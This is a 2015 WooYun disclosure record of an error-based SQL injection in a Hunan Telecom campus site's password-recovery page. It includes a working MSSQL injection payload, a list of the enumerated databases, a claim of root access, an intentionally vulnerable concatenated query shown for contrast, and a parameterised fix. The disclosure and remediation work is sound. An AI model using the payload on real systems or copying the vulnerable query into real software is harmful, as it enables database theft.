
Vulnerability Summary

Defect ID: wooyun-2015-0137515

Title: Hunan Telecom sub-site has a SQL injection exposing large amounts of data

Vendor: China Telecom

Author: oyeahtime

Submitted: 2015-08-30 23:08

Fixed: 2015-10-17 10:32

Disclosed: 2015-10-17 10:32

Type: SQL injection

Severity: High

Self-rated Rank: 10

Status: Handed over to a third-party partner agency (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, please contact [email protected]



Vulnerability Details

Disclosure timeline:

2015-08-30: Details sent to the vendor; awaiting vendor handling
2015-09-02: CNCERT (National Internet Emergency Center) has not yet been able to reach the responsible unit; details disclosed only to the reporting agency
2015-09-12: Details disclosed to core white hats and experts in the relevant field
2015-09-22: Details disclosed to regular white hats
2015-10-02: Details disclosed to intern white hats
2015-10-17: Details disclosed to the public

Brief description:

A Hunan Telecom sub-site has a SQL injection exposing large amounts of data.

Detailed description:

The Hunan Telecom Smart Campus service at http://**.**.**.** applies insufficient filtering on its forgot-password page, which leads to SQL injection.
Injection point:
http://**.**.**.**/FindBackPwd.aspx

---
Parameter: tbName (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwULLTEyNjE0ODU1NjFkZOQm786iBLT750ad4oRCIeuRE2QeYYfbdlkfTiAaOMO4&__EVENTVALIDATION=/wEWBAKlmN3BCALe8o7vBgKx8PK6AwKct7iSDIThgFktCiBfDGD1HoqWuj3rehLiTv5DNUEioZf9vr6q&hID=&tbName=18060479999' AND 8306=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (8306=8306) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(122)+CHAR(113))) AND 'grFO'='grFO&btnSave=
---


The dumped databases probably hold other related data too; I am not sure, I did not go through the tables one by one.
available databases [11]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] XnCms
[*] XnCw
[*] XnDxt
[*] XnJxtCh
[*] XnJxtNew
[*] XnJxtSub
[*] XnSms
Tables dumped from them:
Database: msdb
[95 tables]
Database: XnJxtCh
[167 tables]

Proof of vulnerability:

The current user is root.

Remediation:

Filtering.
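As an added illustration of what that filtering should look like (this is not code from the report or from the affected site), the forgot-password lookup behind FindBackPwd.aspx rewritten for ASP.NET against SQL Server: the input is allow-listed and then bound as a typed parameter instead of being spliced into the SQL text. The table and column names and the 11-digit mobile-number format are assumptions.

```csharp
// Added example (not the site's or report author's code): the forgot-password
// lookup behind FindBackPwd.aspx, written the way the report's fix ("filtering")
// should be implemented in ASP.NET against SQL Server. The table and column
// names and the 11-digit mobile-number format are assumptions.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

public static class FindBackPwdLookup
{
    // Assumed input format: the sample tbName in the report (18060479999) looks
    // like a mainland mobile number, so only 11 digits starting with 1 are accepted.
    private static readonly Regex PhonePattern =
        new Regex(@"^1\d{10}$", RegexOptions.Compiled);

    // The pattern the report describes: tbName is spliced into the SQL text, so a
    // single quote in the input ends the literal and the remainder runs as SQL.
    // An error-based probe such as CONVERT(INT, ...) then leaks data through the
    // conversion error message. Shown for contrast only; never deploy.
    public static string VulnerableQuery(string tbName)
    {
        return "SELECT UserId FROM Sys_ManagerUser_Phone WHERE Phone = '" + tbName + "'";
    }

    // Hardened version: allow-list the value, then bind it as a typed parameter.
    // The parameter travels separately from the SQL text, so no input can alter
    // the statement; the allow-list rejects probe strings before any query runs.
    public static int? FindUserIdByPhone(SqlConnection conn, string tbName)
    {
        if (string.IsNullOrEmpty(tbName) || !PhonePattern.IsMatch(tbName))
            return null;

        const string sql = "SELECT UserId FROM Sys_ManagerUser_Phone WHERE Phone = @phone";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@phone", SqlDbType.VarChar, 11).Value = tbName;
            object result = cmd.ExecuteScalar();
            if (result == null || result == DBNull.Value)
                return null;
            return Convert.ToInt32(result);
        }
    }
}
```

Error-based extraction also relies on the database error text reaching the browser; parameterisation closes that path for this query, and disabling detailed error pages in production (customErrors in web.config) removes the oracle for any bug that remains.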

Copyright notice: when reposting, please credit the source oyeahtime@WooYun


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-09-02 10:31

Vendor reply:

CNVD has confirmed and reproduced the described situation and has forwarded it through CNCERT to China Telecom Group Corporation, which will coordinate handling with the site's administering department.

Latest status:

None yet